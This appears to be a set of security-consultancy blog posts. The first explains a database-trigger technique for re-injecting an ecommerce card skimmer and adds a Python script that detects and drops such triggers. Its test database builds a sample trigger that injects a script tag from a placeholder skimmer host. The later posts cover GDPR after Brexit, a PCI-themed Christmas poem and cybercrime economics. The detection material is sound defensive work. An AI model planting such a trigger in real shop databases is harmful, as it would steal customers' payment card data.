Emerging Trend: Persistent JavaScript Ecommerce Malware

Our analysts report another trend that administrators should be aware of: a JavaScript-based eCommerce malware that re-infects websites automatically after an incomplete removal. It has been identified as a new technique being used by cyber criminals.

This type of malware obtains its persistence by modifying the database to force the injection of a malicious JavaScript file into an eCommerce webpage. By targeting the database, the malware becomes resilient to normal removal attempts. Cyber criminals have recently used this technique against eCommerce merchants, successfully injecting the JavaScript code into a database field of a merchant's website and compromising payment card data.

This reinfection method can be used on any eCommerce platform that uses database fields to populate content on the shopping cart webpage. Reinfection of a website proceeds as follows:
1. A database trigger is added to the order table, which injects the malicious JavaScript link into the website template fields.
2. The trigger is executed every time a new order is made, so the link is re-added even after the template fields have been cleaned.

Scanning HTML files for malicious code is not sufficient on its own to detect this malware. Analysis of the database is required to ensure a proper clean-up of JavaScript eCommerce malware is carried out.
Regular scanning of web servers for malware is one recommended mitigation measure eCommerce websites can take to identify security vulnerabilities. Another recommended best practice is to check eCommerce websites for malicious database triggers and remove any that are found.
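The trigger check described above, as an added example that is not part of the original post or of any SRM tooling: it enumerates the triggers defined in the shop database, flags any whose body contains script markup, an external URL or a write into a page/template content table, and drops the flagged ones. The table names, the sample store and the placeholder script host are all constructed for the example; the SQLite schema catalogue stands in for MySQL's information_schema.TRIGGERS.

```python
import re
import sqlite3

# Markers of the reinfection hook described above: script markup or an external
# URL in the trigger body, and writes into tables that feed the page templates.
SCRIPT_MARKUP = re.compile(r"<script|\.js\b|https?://", re.IGNORECASE)
CONTENT_TABLES = ("cms_block", "cms_page", "core_config_data")  # assumed names

def audit_triggers(conn):
    """Return [(trigger, table, reasons)] for triggers that look like the hook.
    Source is read from sqlite_master; on MySQL use information_schema.TRIGGERS."""
    rows = conn.execute(
        "SELECT name, tbl_name, sql FROM sqlite_master WHERE type = 'trigger'"
    ).fetchall()
    findings = []
    for name, table, body in rows:
        reasons = []
        if SCRIPT_MARKUP.search(body):
            reasons.append("body contains script markup or an external URL")
        if any(re.search(rf"\b{t}\b", body, re.IGNORECASE) for t in CONTENT_TABLES):
            reasons.append("body writes to a page/template content table")
        if reasons:
            findings.append((name, table, reasons))
    return findings

def drop_triggers(conn, names):
    """Remediation: drop the flagged triggers, return how many were removed."""
    for name in names:
        conn.execute(f'DROP TRIGGER IF EXISTS "{name}"')
    conn.commit()
    return len(names)

def build_sample_db():
    """Constructed in-memory shop DB: one legitimate trigger plus one modelled on
    the technique above (the script host is a placeholder, not a real indicator)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE sales_order (id INTEGER PRIMARY KEY, sku TEXT);
        CREATE TABLE stock (sku TEXT PRIMARY KEY, qty INTEGER);
        CREATE TABLE cms_block (id INTEGER PRIMARY KEY, content TEXT);
        CREATE TRIGGER stock_decrement AFTER INSERT ON sales_order
        BEGIN UPDATE stock SET qty = qty - 1 WHERE sku = NEW.sku; END;
        CREATE TRIGGER order_hook AFTER INSERT ON sales_order
        BEGIN UPDATE cms_block SET content = content ||
            '<script src="https://skimmer.example.invalid/s.js"></script>'
            WHERE content NOT LIKE '%skimmer.example.invalid%'; END;
    """)
    return conn
```

Any trigger the audit flags should be reviewed against the platform's known triggers before it is dropped, since a legitimate extension may also write to content tables.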

If you are in doubt, contact the SRM team, who can arrange to run a check for you.

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

The uncertainty of Brexit, the certainty of GDPR and the responsibilities of the CISO

As Britain navigates its way through the choppy waters of Brexit, there is a great deal of uncertainty about exactly what form our new relationship with Europe will take. In many ways our trading relationships will change; this is the inevitable uncertainty. But on one level the situation is significantly clearer: UK businesses will still be required to comply with EU law if they wish to maintain any trade links with European customers. So the General Data Protection Regulation (GDPR) which comes into effect on 25th May 2018 will still apply to most of us.

But the trouble with certainty is that it is rarely ever that simple. When it comes to our relationship with Europe, it appears that the words of John Allen Paulos, an American professor of mathematics, apply: ‘Uncertainty is the only certainty there is’. So where does this leave the CISO, whose responsibility it is to ensure compliance with not only GDPR but also any future UK and EU regulations? Well, the clever mathematician went on to say that ‘knowing how to live with insecurity is the only security.’ And this is the key.

By accepting a degree of insecurity and establishing a means by which to manage it, a CISO can maintain compliance and provide strategic direction for the company’s information security agenda. The following steps will help to navigate this difficult course.

  1. Continue to steer towards whole company compliance with the existing information security standards like PCI DSS, Cyber Essentials, ISO 27001 and ISO 9001. Embedding these standards within your business will ensure you are well placed to deal with new challenges on the horizon.
  2. Work with an established professional team which will not only help you set your course but will also support, enhance and resource your information security strategic agenda. As industry experts they will know about impending changes and will ensure your compliance objectives take these into account.
  3. Make sure everyone on your ship is heading in the same direction. To do this you will need to exert board-level influence. With access to a high level of technical expertise and strategic guidance, the CISO will be able to articulate the state of information security to the company stakeholders and lead employees, securing company-wide support and making the case for adequate resources. This will set you up to be flexible and responsive to change.

SRM’s VirtualCISO™ has been developed to provide a cost-effective, bespoke solution for organisations without a CISO, or where a board-level strategic adviser is required to ensure information security remains high on the board agenda. The SRM VirtualCISO™ has access to an extensive portfolio of professional services to help embed information security throughout your organisation.

A Cautionary Christmas Tale

‘Twas the night before Christmas, and all through the house,
Not an iPad was stirring, nor PC or Mouse;

The shopping had been done on the internet with care,
In hope that the presents soon would be there;

The payments were processed, at least in their heads,
Until they found out their account was in shreds;

What should have resulted in toys in gift wrap;
Had led them into an elaborate trap,

The fraudsters had found an outdated website;
And changed the checkout so it wasn’t quite right,

Away to the next site, Dad went like a flash;
Not knowing his card was in the fraudsters’ stash

The website looked fine but ‘twas misdirection;
He’d fallen foul of Sequel Injection,

The site wasn’t bad, that should be made clear;
But the standards ignored, no PCI here.

With hackers so many, so lively and quick;
The change was so easy, it was done in a click,

So please spare a thought, when you next do your shopping,
And check that the site that you found while you’re hopping,

Is up to the standard to which we’re reliant;
And make sure it’s one that is PCI compliant.

Information Security Consultant, SRM's Principal PCI DSS QSA and Payment Card Industry expert, Paul B is a regular contributor to the SRM blog.

The Digital Economy

Decentralized cryptocurrencies and Dark Web cartels challenge the effectiveness of legislation, jurisdiction and law enforcement. This poses the question, when the economy is becoming more and more dependent on the internet, is the government losing control?

I’ll leave you to make that decision.

The government uses laws and theories to control and protect economic activity. But what is the significance of the Proceeds of Crime Act 2002 when funds are being stolen and converted into Bitcoin – a decentralized currency that no government has control over? What is the significance of international indictment agreements when the Dark Web conceals the location of the criminals?

Untraceable. Unrecoverable. Unidentifiable. These are all terms that cyber-incompetent businesses should get used to. They are the consequences of negligence in an ever-changing landscape.

Arguably, more intelligence could assist in finding and bringing criminals to justice, as we have seen in many other high-profile cybercrime cases. When police budgets are being cut, what is the likelihood that petty cybercriminals will be caught when resources are so limited? As traffic to the Dark Web increases due to its exposure in the media and on primetime television shows, this pressure is likely to grow.

Furthermore, perpetrators are not limited by national borders. The UK has one of the strongest digital economies in the world, accounting for more than 25% of its GDP. Naturally, all this activity makes it a prime target for cyber criminals around the world. We would normally depend on our government to take the necessary steps to protect our economy; however, the freedoms provided by the internet make this more difficult. Thus being aware of the threats benefits not only you, but the entire digital economy.

The internet has reformed the way we do business. The playing field is filled with opportunity, but is more dynamic, volatile and uncertain than ever before, and is starting to have a big role within economies around the world. Whether that worries you or not depends on whether you are prepared!

PCI Breach Trend Report September 2015 – January 2016

This issue of SRM’s breach trend report covers the period September 2015 – January 2016 and looks at businesses that required a PFI investigation. The data presented examines the most common types of businesses affected, as well as their trading size, to present a broad picture of how breaches can occur across the industry.